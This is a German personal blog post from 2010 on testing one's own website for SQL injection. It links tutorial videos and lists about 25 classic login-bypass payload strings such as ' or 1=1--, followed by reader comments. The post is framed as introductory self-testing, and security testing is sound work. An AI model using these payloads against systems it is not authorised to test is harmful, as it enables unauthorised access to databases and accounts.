Home » sonstiges » Wie testet man SQL Injection Schwachstellen?

Wie testet man SQL Injection Schwachstellen?

1 Stern2 Sterne3 Sterne4 Sterne5 Sterne (Noch keine Bewertung)
Loading...

Wenn man eine eigne Webseite mit Datenbank hat wird man unweigerlich mit der Themtik SQL Injection konfrontiert werden. Es gibt eben zu viele Skript Kiddies da draußen, die meistens aus neugier heraus versuchen Webseiten, bzw. MYSQL Datenbanken zu hacken.

Ich selber wurde schon Opfer solcher Attacken. Es ist enorm wichtig seinen Server, bzw. sein CMS immer auf den aktuellsten stand zu halten, aber das wisst ihr wahrscheinlich schon.

Ich selber bin kein Hacker oder Coder, sondern wurschtel mich so durch die digitalen Datenwelten und eigne mir das Wissen an, was ich gerade in der Situation brauche. Inspiriert zu diesem Artikel hat mich die Session „Linkbuilding beyond the line“ vom BösenSEO auf der SEOCAMPIXX 2k10. Denn bisher habe ich mich immer nur über Angreifer meiner Webseiten geärgert und die Fehler in meinen Dateien beseitigt. Ich fragte mich, wie die Angreifer meine Datenbank austricksten konnten.

Umso erschreckender ist, wie einfach es ist an das Wissen für SQL Injection Attacken zu kommen. Generell Hacker Stuff ist sehr leicht im Netz zu finden, wenn man die entsprechenden Keyword kennt, wonach man suchen muss.
Wobei ich glaube, dass das wirklich gefährliche Wissen nicht so einfach zu erhalten ist. Auch sollte man nicht jedes zum Download angeboten Tool herunterladen, da es selber als Trojaner dienen könnte.

Auf Youtube findet man mehrere Lehrvideos auf Deutsch oder auf Englisch zum Thema SQL Injection. Hier zwei Lehrvideos zum Thema:

SQL-Injection – Einführung – Teil 1

[youtube 1UL_jdtXfi4]

SQL-Injection – Einführung – Teil 2

[youtube nLmf-YlKpWo]

Mögliche Variablen zum Testen
‚or“=‘
1’or’1’=’1
0’or’0’=’0
admin‘–
‚ or 0=0 —
“ or 0=0 —
or 0=0 —
‚ or 0=0 #
“ or 0=0 #
or 0=0 #
‚ or ‚x’=’x
“ or „x“=“x“
‚) or (‚x’=’x
‚ or 1=1–
“ or 1=1–
or 1=1–
‚ or a=a–
“ or „a“=“a
‚) or (‚a’=’a
„) or („a“=“a
hi“ or 1=1 —
hi‘ or 1=1 —
hi‘ or ‚a’=’a
hi‘) or (‚a’=’a
hi“) or („a“=“a

Ich nutze nun dieses Wissen um meine eigene Seiten aktiv nach eventuellen Schwachstellen zu testen. Dieser Artikel erhebt in keinsterweise den Anspruch das Thema SQL Injection vollständig abzudecken, es dient lediglich als Einstieg in die Thematik.

Welche Erfahrungen habt ihr mit SQL Injections gemacht? Wie schützt ihr euch vor Angreifern?

7 Kommentare

  1. 20. März 2010 um 09:48 — Antworten

    Wie testet man SQL Injection Schwachstellen? –> https://www.baynado.de/blog/wie-testet-man-sql-injection-schwachstellen

  2. 20. März 2010 um 10:12 — Antworten

    RT @Baynados: Wie testet man SQL Injection Schwachstellen? –> https://www.baynado.de/blog/wie-testet-man-sql-injection-schwachstellen

  3. 20. März 2010 um 10:20 — Antworten

    Wie testet man SQL Injection Schwachstellen?: Wenn man eine eigne Webseite mit Datenbank hat wird man unweigerl… http://cli.gs/6jqYd #seo

  4. 20. März 2010 um 11:16 — Antworten

    Aktuelle WP Version, aktuelle Plugins und davon nicht zu viele, keine dubiosen Sachen einbinden und wp-admin mit .htaccess Passwortschutz belegt & keine Registrierung für andere Benutzer geöffnet weil ich ja eh nur einer bin.. noch nie etwaige Probleme damit gehabt 🙂

  5. 20. März 2010 um 12:18 — Antworten

    SQL Injection Schwachstellen Finden. http://tinyurl.com/ygh9t7s

  6. 20. März 2010 um 12:31 — Antworten

    Wie testet man SQL Injection Schwachstellen? http://bit.ly/9VyzQz #sicherheit

  7. 20. März 2010 um 12:35 — Antworten

    RT @schoysi: SQL Injection Schwachstellen Finden. http://tinyurl.com/ygh9t7s

Hinterlasse eine Antwort

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert *

This site uses Akismet to reduce spam. Learn how your comment data is processed.